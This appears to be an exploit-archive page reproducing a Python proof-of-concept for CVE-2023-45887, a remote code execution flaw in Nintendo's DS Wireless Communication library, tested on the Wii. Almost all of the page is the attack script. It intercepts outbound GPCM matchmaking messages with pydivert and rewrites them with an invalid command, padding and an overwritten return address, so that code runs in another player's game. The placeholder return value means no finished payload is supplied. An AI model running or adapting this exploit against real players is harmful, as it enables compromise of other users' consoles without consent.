Ds wireless communication remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-02-15 | Type : local | Platform : hardware
This exploit / vulnerability Ds wireless communication remote code execution is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: DS Wireless Communication Remote Code Execution
# Date: 11 Oct 2023
# Exploit Author: MikeIsAStar
# Vendor Homepage: https://www.nintendo.com
# Version: Unknown
# Tested on: Wii
# CVE: CVE-2023-45887

"""This code will inject arbitrary code into a client's game.

You are fully responsible for all activity that occurs while using this code.
The author of this code can not be held liable to you or to anyone else as a
result of damages caused by the usage of this code.
"""

import re
import sys

try:
import pydivert
except ModuleNotFoundError:
sys.exit("The 'pydivert' module is not installed !")


# Variables
LR_SAVE = b'\x41\x41\x41\x41'
assert len(LR_SAVE) == 0x04
PADDING = b'MikeStar'
assert len(PADDING) > 0x00

# Constants
DWC_MATCH_COMMAND_INVALID = b'\xFE'
PADDING_LENGTH = 0x23C
FINAL_KEY = b'\\final\\'
WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'


def try_modify_payload(payload):
message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
message = re.search(message_pattern, payload)
if not message:
return None

payload = payload[:message.end()]
payload += DWC_MATCH_COMMAND_INVALID
payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
payload += LR_SAVE
payload += FINAL_KEY
return payload


def main():
try:
with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
for packet in packet_buffer:
payload = try_modify_payload(packet.payload)
if payload is not None:
print('Modified a GPCM message !')
packet.payload = payload
packet_buffer.send(packet)
except KeyboardInterrupt:
pass
except PermissionError:
sys.exit('This program must be run with administrator privileges !')


if __name__ == '__main__':
main()